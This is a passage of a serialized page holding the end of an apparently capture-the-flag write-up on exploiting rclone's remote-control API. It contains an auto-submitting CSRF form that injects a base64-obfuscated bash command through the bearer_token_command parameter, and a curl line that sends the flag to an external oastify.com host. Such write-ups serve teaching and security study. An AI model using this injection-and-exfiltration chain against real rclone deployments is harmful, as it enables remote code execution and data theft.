-->\n",{"type":32,"tag":81,"props":2345,"children":2346},{"class":83,"line":100},[2347,2351,2355,2359,2363,2367,2371,2375,2379,2383,2387,2392,2396],{"type":32,"tag":81,"props":2348,"children":2349},{"style":94},[2350],{"type":37,"value":1905},{"type":32,"tag":81,"props":2352,"children":2353},{"style":503},[2354],{"type":37,"value":2114},{"type":32,"tag":81,"props":2356,"children":2357},{"style":860},[2358],{"type":37,"value":2119},{"type":32,"tag":81,"props":2360,"children":2361},{"style":94},[2362],{"type":37,"value":2124},{"type":32,"tag":81,"props":2364,"children":2365},{"style":206},[2366],{"type":37,"value":1941},{"type":32,"tag":81,"props":2368,"children":2369},{"style":127},[2370],{"type":37,"value":2133},{"type":32,"tag":81,"props":2372,"children":2373},{"style":206},[2374],{"type":37,"value":1941},{"type":32,"tag":81,"props":2376,"children":2377},{"style":860},[2378],{"type":37,"value":2142},{"type":32,"tag":81,"props":2380,"children":2381},{"style":94},[2382],{"type":37,"value":2124},{"type":32,"tag":81,"props":2384,"children":2385},{"style":206},[2386],{"type":37,"value":884},{"type":32,"tag":81,"props":2388,"children":2389},{"style":127},[2390],{"type":37,"value":2391},"http://rclone:5572/operations/list?fs=test_csrf:&remote=",{"type":32,"tag":81,"props":2393,"children":2394},{"style":206},[2395],{"type":37,"value":884},{"type":32,"tag":81,"props":2397,"children":2398},{"style":94},[2399],{"type":37,"value":1915},{"type":32,"tag":81,"props":2401,"children":2402},{"class":83,"line":113},[2403,2407,2411,2415,2419,2423,2427,2431,2435,2439,2443,2447,2451],{"type":32,"tag":81,"props":2404,"children":2405},{"style":94},[2406],{"type":37,"value":2171},{"type":32,"tag":81,"props":2408,"children":2409},{"style":503},[2410],{"type":37,"value":2176},{"type":32,"tag":81,"props":2412,"children":2413},{"style":860},[2414],{"type":37,"value":2181},{"type":32,"tag":81,"props":2416,"children":2417},{"style":94},[2418],{"type":37,"value":2124},{"type":32,"tag":81,"props":2420,"children":2421},{"style":206},[2422],{"type":37,"value":1941},{"type":32,"tag":81,"props":2424,"children":2425},{"style":127},[2426],{"type":37,"value":2194},{"type":32,"tag":81,"props":2428,"children":2429},{"style":206},[2430],{"type":37,"value":1941},{"type":32,"tag":81,"props":2432,"children":2433},{"style":860},[2434],{"type":37,"value":2203},{"type":32,"tag":81,"props":2436,"children":2437},{"style":94},[2438],{"type":37,"value":2124},{"type":32,"tag":81,"props":2440,"children":2441},{"style":206},[2442],{"type":37,"value":1941},{"type":32,"tag":81,"props":2444,"children":2445},{"style":127},[2446],{"type":37,"value":2216},{"type":32,"tag":81,"props":2448,"children":2449},{"style":206},[2450],{"type":37,"value":1941},{"type":32,"tag":81,"props":2452,"children":2453},{"style":94},[2454],{"type":37,"value":2225},{"type":32,"tag":81,"props":2456,"children":2457},{"class":83,"line":133},[2458,2462,2466],{"type":32,"tag":81,"props":2459,"children":2460},{"style":94},[2461],{"type":37,"value":2171},{"type":32,"tag":81,"props":2463,"children":2464},{"style":503},[2465],{"type":37,"value":1910},{"type":32,"tag":81,"props":2467,"children":2468},{"style":94},[2469],{"type":37,"value":1915},{"type":32,"tag":81,"props":2471,"children":2472},{"class":83,"line":152},[2473,2477,2481,2485,2489,2493,2497,2501],{"type":32,"tag":81,"props":2474,"children":2475},{"style":860},[2476],{"type":37,"value":2248},{"type":32,"tag":81,"props":2478,"children":2479},{"style":94},[2480],{"type":37,"value":868},{"type":32,"tag":81,"props":2482,"children":2483},{"style":860},[2484],{"type":37,"value":2257},{"type":32,"tag":81,"props":2486,"children":2487},{"style":94},[2488],{"type":37,"value":2262},{"type":32,"tag":81,"props":2490,"children":2491},{"style":146},[2492],{"type":37,"value":2267},{"type":32,"tag":81,"props":2494,"children":2495},{"style":94},[2496],{"type":37,"value":2272},{"type":32,"tag":81,"props":2498,"children":2499},{"style":871},[2500],{"type":37,"value":2194},{"type":32,"tag":81,"props":2502,"children":2503},{"style":94},[2504],{"type":37,"value":2281},{"type":32,"tag":81,"props":2506,"children":2507},{"class":83,"line":165},[2508,2512,2516],{"type":32,"tag":81,"props":2509,"children":2510},{"style":94},[2511],{"type":37,"value":2289},{"type":32,"tag":81,"props":2513,"children":2514},{"style":503},[2515],{"type":37,"value":1910},{"type":32,"tag":81,"props":2517,"children":2518},{"style":94},[2519],{"type":37,"value":1915},{"type":32,"tag":81,"props":2521,"children":2522},{"class":83,"line":185},[2523,2527,2531],{"type":32,"tag":81,"props":2524,"children":2525},{"style":94},[2526],{"type":37,"value":2070},{"type":32,"tag":81,"props":2528,"children":2529},{"style":503},[2530],{"type":37,"value":2114},{"type":32,"tag":81,"props":2532,"children":2533},{"style":94},[2534],{"type":37,"value":1915},{"type":32,"tag":46,"props":2536,"children":2537},{},[2538],{"type":37,"value":2539},"If we go to the dashboard we can see that a new remote has been created named \"CSRF\".",{"type":32,"tag":56,"props":2541,"children":2543},{"imgSrc":2542},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721252881/writeups/rclone_dashboard.webp",[],{"type":32,"tag":46,"props":2545,"children":2546},{},[2547],{"type":37,"value":2548},"Also, we can see that in the /tmp folder a file named lolipop_from_bot has indeed been created",{"type":32,"tag":56,"props":2550,"children":2552},{"imgSrc":2551},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721252881/writeups/ls_tmp_from_bot.webp",[],{"type":32,"tag":46,"props":2554,"children":2555},{},[2556],{"type":37,"value":2557},"Now that we have POC the RCE via the bot, another problem arises: we do not have the possibility to retrieve the flag directly from the rclone docker because it does not have internet access. However, the rclone service is on the same network as the bot. To do this, we will need to go through the bot that will forward the information to us.",{"type":32,"tag":39,"props":2559,"children":2561},{"id":2560},"final-payload",[2562],{"type":37,"value":2563},"Final payload",{"type":32,"tag":46,"props":2565,"children":2566},{},[2567],{"type":37,"value":2568},"As previously mentioned, our final bash payload will look like this:\nIt makes a request to the bot that passes a webhook URL in the body, and the flag is passed in the webhook URL.",{"type":32,"tag":66,"props":2570,"children":2571},{"lang":1611},[2572],{"type":32,"tag":71,"props":2573,"children":2575},{"code":2574,"language":1611,"meta":7,"className":1616,"style":7},"curl -H \"Content-type: application/x-www-form-urlencoded\" -d \"url=https://r7z7f6ul1nguh27mf65wveqeu500osch.oastify.com/?flag=$(/readflag | base64)\" http://bot:8000/submit\n",[2576],{"type":32,"tag":77,"props":2577,"children":2578},{"__ignoreMap":7},[2579],{"type":32,"tag":81,"props":2580,"children":2581},{"class":83,"line":84},[2582,2587,2592,2596,2601,2605,2610,2614,2619,2624,2629,2634,2639,2643,2647],{"type":32,"tag":81,"props":2583,"children":2584},{"style":871},[2585],{"type":37,"value":2586},"curl",{"type":32,"tag":81,"props":2588,"children":2589},{"style":1630},[2590],{"type":37,"value":2591}," -H",{"type":32,"tag":81,"props":2593,"children":2594},{"style":206},[2595],{"type":37,"value":209},{"type":32,"tag":81,"props":2597,"children":2598},{"style":127},[2599],{"type":37,"value":2600},"Content-type: application/x-www-form-urlencoded",{"type":32,"tag":81,"props":2602,"children":2603},{"style":206},[2604],{"type":37,"value":1941},{"type":32,"tag":81,"props":2606,"children":2607},{"style":1630},[2608],{"type":37,"value":2609}," -d",{"type":32,"tag":81,"props":2611,"children":2612},{"style":206},[2613],{"type":37,"value":209},{"type":32,"tag":81,"props":2615,"children":2616},{"style":127},[2617],{"type":37,"value":2618},"url=https://r7z7f6ul1nguh27mf65wveqeu500osch.oastify.com/?flag=",{"type":32,"tag":81,"props":2620,"children":2621},{"style":94},[2622],{"type":37,"value":2623},"$(",{"type":32,"tag":81,"props":2625,"children":2626},{"style":871},[2627],{"type":37,"value":2628},"/readflag",{"type":32,"tag":81,"props":2630,"children":2631},{"style":901},[2632],{"type":37,"value":2633}," |",{"type":32,"tag":81,"props":2635,"children":2636},{"style":871},[2637],{"type":37,"value":2638}," base64",{"type":32,"tag":81,"props":2640,"children":2641},{"style":94},[2642],{"type":37,"value":928},{"type":32,"tag":81,"props":2644,"children":2645},{"style":206},[2646],{"type":37,"value":1941},{"type":32,"tag":81,"props":2648,"children":2649},{"style":127},[2650],{"type":37,"value":2651}," http://bot:8000/submit\n",{"type":32,"tag":46,"props":2653,"children":2654},{},[2655],{"type":37,"value":2656},"For more flexibility, we will encode our payload in base64 and pass it in bash command like this:",{"type":32,"tag":66,"props":2658,"children":2659},{"lang":1611},[2660],{"type":32,"tag":71,"props":2661,"children":2663},{"code":2662,"language":1611,"meta":7,"className":1616,"style":7},"bash -c \"echo Y3VybCAtSCAiQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIC1kICJ1cmw9aHR0cHM6Ly9yN3o3ZjZ1bDFuZ3VoMjdtZjY1d3ZlcWV1NTAwb3NjaC5vYXN0aWZ5LmNvbS8/ZmxhZz0kKC9yZWFkZmxhZyB8IGJhc2U2NCkiIGh0dHA6Ly9ib3Q6ODAwMC9zdWJtaXQ%3d | base64 -d |bash\"\n",[2664],{"type":32,"tag":77,"props":2665,"children":2666},{"__ignoreMap":7},[2667],{"type":32,"tag":81,"props":2668,"children":2669},{"class":83,"line":84},[2670,2674,2678,2682,2687],{"type":32,"tag":81,"props":2671,"children":2672},{"style":871},[2673],{"type":37,"value":1611},{"type":32,"tag":81,"props":2675,"children":2676},{"style":1630},[2677],{"type":37,"value":1633},{"type":32,"tag":81,"props":2679,"children":2680},{"style":206},[2681],{"type":37,"value":209},{"type":32,"tag":81,"props":2683,"children":2684},{"style":127},[2685],{"type":37,"value":2686},"echo Y3VybCAtSCAiQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIC1kICJ1cmw9aHR0cHM6Ly9yN3o3ZjZ1bDFuZ3VoMjdtZjY1d3ZlcWV1NTAwb3NjaC5vYXN0aWZ5LmNvbS8/ZmxhZz0kKC9yZWFkZmxhZyB8IGJhc2U2NCkiIGh0dHA6Ly9ib3Q6ODAwMC9zdWJtaXQ%3d | base64 -d |bash",{"type":32,"tag":81,"props":2688,"children":2689},{"style":206},[2690],{"type":37,"value":219},{"type":32,"tag":46,"props":2692,"children":2693},{},[2694],{"type":37,"value":2695},"Our final payload fully encoded using in our CSRF will look like this:",{"type":32,"tag":66,"props":2697,"children":2698},{"lang":1880},[2699],{"type":32,"tag":71,"props":2700,"children":2702},{"code":2701,"language":1880,"meta":7,"className":1885,"style":7},"\u003Cform method=\"POST\" action='http://rclone:5572/config/create?parameters={\"url\"%3a\"http%3a//not_exist.localhost:9999\",\"bearer_token_command\"%3a\"bash+-c+echo${IFS}Y3VybCAtSCAiQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIC1kICJ1cmw9aHR0cHM6Ly9yN3o3ZjZ1bDFuZ3VoMjdtZjY1d3ZlcWV1NTAwb3NjaC5vYXN0aWZ5LmNvbS8/ZmxhZz0kKC9yZWFkZmxhZyB8IGJhc2U2NCkiIGh0dHA6Ly9ib3Q6ODAwMC9zdWJtaXQ%3d|${IFS}base64${IFS}-d|${IFS}bash\"}&name=csrf&type=webdav'>\n \u003Cinput type=\"submit\" value=\"CSRF\" />\n \u003Cscript>\n document.forms[0].submit();\n \u003C/script>\n\u003C/form>\n",[2703],{"type":32,"tag":77,"props":2704,"children":2705},{"__ignoreMap":7},[2706,2762,2817,2832,2867,2882],{"type":32,"tag":81,"props":2707,"children":2708},{"class":83,"line":84},[2709,2713,2717,2721,2725,2729,2733,2737,2741,2745,2749,2754,2758],{"type":32,"tag":81,"props":2710,"children":2711},{"style":94},[2712],{"type":37,"value":1905},{"type":32,"tag":81,"props":2714,"children":2715},{"style":503},[2716],{"type":37,"value":2114},{"type":32,"tag":81,"props":2718,"children":2719},{"style":860},[2720],{"type":37,"value":2119},{"type":32,"tag":81,"props":2722,"children":2723},{"style":94},[2724],{"type":37,"value":2124},{"type":32,"tag":81,"props":2726,"children":2727},{"style":206},[2728],{"type":37,"value":1941},{"type":32,"tag":81,"props":2730,"children":2731},{"style":127},[2732],{"type":37,"value":2133},{"type":32,"tag":81,"props":2734,"children":2735},{"style":206},[2736],{"type":37,"value":1941},{"type":32,"tag":81,"props":2738,"children":2739},{"style":860},[2740],{"type":37,"value":2142},{"type":32,"tag":81,"props":2742,"children":2743},{"style":94},[2744],{"type":37,"value":2124},{"type":32,"tag":81,"props":2746,"children":2747},{"style":206},[2748],{"type":37,"value":884},{"type":32,"tag":81,"props":2750,"children":2751},{"style":127},[2752],{"type":37,"value":2753},"http://rclone:5572/config/create?parameters={\"url\"%3a\"http%3a//not_exist.localhost:9999\",\"bearer_token_command\"%3a\"bash+-c+echo${IFS}Y3VybCAtSCAiQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIC1kICJ1cmw9aHR0cHM6Ly9yN3o3ZjZ1bDFuZ3VoMjdtZjY1d3ZlcWV1NTAwb3NjaC5vYXN0aWZ5LmNvbS8/ZmxhZz0kKC9yZWFkZmxhZyB8IGJhc2U2NCkiIGh0dHA6Ly9ib3Q6ODAwMC9zdWJtaXQ%3d|${IFS}base64${IFS}-d|${IFS}bash\"}&name=csrf&type=webdav",{"type":32,"tag":81,"props":2755,"children":2756},{"style":206},[2757],{"type":37,"value":884},{"type":32,"tag":81,"props":2759,"children":2760},{"style":94},[2761],{"type":37,"value":1915},{"type":32,"tag":81,"props":2763,"children":2764},{"class":83,"line":100},[2765,2769,2773,2777,2781,2785,2789,2793,2797,2801,2805,2809,2813],{"type":32,"tag":81,"props":2766,"children":2767},{"style":94},[2768],{"type":37,"value":2171},{"type":32,"tag":81,"props":2770,"children":2771},{"style":503},[2772],{"type":37,"value":2176},{"type":32,"tag":81,"props":2774,"children":2775},{"style":860},[2776],{"type":37,"value":2181},{"type":32,"tag":81,"props":2778,"children":2779},{"style":94},[2780],{"type":37,"value":2124},{"type":32,"tag":81,"props":2782,"children":2783},{"style":206},[2784],{"type":37,"value":1941},{"type":32,"tag":81,"props":2786,"children":2787},{"style":127},[2788],{"type":37,"value":2194},{"type":32,"tag":81,"props":2790,"children":2791},{"style":206},[2792],{"type":37,"value":1941},{"type":32,"tag":81,"props":2794,"children":2795},{"style":860},[2796],{"type":37,"value":2203},{"type":32,"tag":81,"props":2798,"children":2799},{"style":94},[2800],{"type":37,"value":2124},{"type":32,"tag":81,"props":2802,"children":2803},{"style":206},[2804],{"type":37,"value":1941},{"type":32,"tag":81,"props":2806,"children":2807},{"style":127},[2808],{"type":37,"value":2216},{"type":32,"tag":81,"props":2810,"children":2811},{"style":206},[2812],{"type":37,"value":1941},{"type":32,"tag":81,"props":2814,"children":2815},{"style":94},[2816],{"type":37,"value":2225},{"type":32,"tag":81,"props":2818,"children":2819},{"class":83,"line":113},[2820,2824,2828],{"type":32,"tag":81,"props":2821,"children":2822},{"style":94},[2823],{"type":37,"value":2171},{"type":32,"tag":81,"props":2825,"children":2826},{"style":503},[2827],{"type":37,"value":1910},{"type":32,"tag":81,"props":2829,"children":2830},{"style":94},[2831],{"type":37,"value":1915},{"type":32,"tag":81,"props":2833,"children":2834},{"class":83,"line":133},[2835,2839,2843,2847,2851,2855,2859,2863],{"type":32,"tag":81,"props":2836,"children":2837},{"style":860},[2838],{"type":37,"value":2248},{"type":32,"tag":81,"props":2840,"children":2841},{"style":94},[2842],{"type":37,"value":868},{"type":32,"tag":81,"props":2844,"children":2845},{"style":860},[2846],{"type":37,"value":2257},{"type":32,"tag":81,"props":2848,"children":2849},{"style":94},[2850],{"type":37,"value":2262},{"type":32,"tag":81,"props":2852,"children":2853},{"style":146},[2854],{"type":37,"value":2267},{"type":32,"tag":81,"props":2856,"children":2857},{"style":94},[2858],{"type":37,"value":2272},{"type":32,"tag":81,"props":2860,"children":2861},{"style":871},[2862],{"type":37,"value":2194},{"type":32,"tag":81,"props":2864,"children":2865},{"style":94},[2866],{"type":37,"value":2281},{"type":32,"tag":81,"props":2868,"children":2869},{"class":83,"line":152},[2870,2874,2878],{"type":32,"tag":81,"props":2871,"children":2872},{"style":94},[2873],{"type":37,"value":2289},{"type":32,"tag":81,"props":2875,"children":2876},{"style":503},[2877],{"type":37,"value":1910},{"type":32,"tag":81,"props":2879,"children":2880},{"style":94},[2881],{"type":37,"value":1915},{"type":32,"tag":81,"props":2883,"children":2884},{"class":83,"line":165},[2885,2889,2893],{"type":32,"tag":81,"props":2886,"children":2887},{"style":94},[2888],{"type":37,"value":2070},{"type":32,"tag":81,"props":2890,"children":2891},{"style":503},[2892],{"type":37,"value":2114},{"type":32,"tag":81,"props":2894,"children":2895},{"style":94},[2896],{"type":37,"value":1915},{"type":32,"tag":46,"props":2898,"children":2899},{},[2900],{"type":37,"value":2901},"Same as before, we need to create another CSRF to trigger the command.",{"type":32,"tag":46,"props":2903,"children":2904},{},[2905],{"type":37,"value":2906},"We now just need to host these files on a site that the bot can access and submit the URL to the bot.",{"type":32,"tag":46,"props":2908,"children":2909},{},[2910],{"type":37,"value":2911},"And our webhook will receive the flag:",{"type":32,"tag":56,"props":2913,"children":2915},{"imgSrc":2914},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721248952/writeups/rclone/flag_webhook.webp",[],{"type":32,"tag":2917,"props":2918,"children":2919},"style",{},[2920],{"type":37,"value":2921},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":100,"depth":84,"links":2923},[2924,2925,2926,2927,2928],{"id":41,"depth":100,"text":44},{"id":509,"depth":100,"text":512},{"id":1564,"depth":100,"text":1567},{"id":1754,"depth":100,"text":1757},{"id":2560,"depth":100,"text":2563},"markdown","content:writeups:rclone.md","content","writeups/rclone.md","writeups/rclone","md",1749027224521]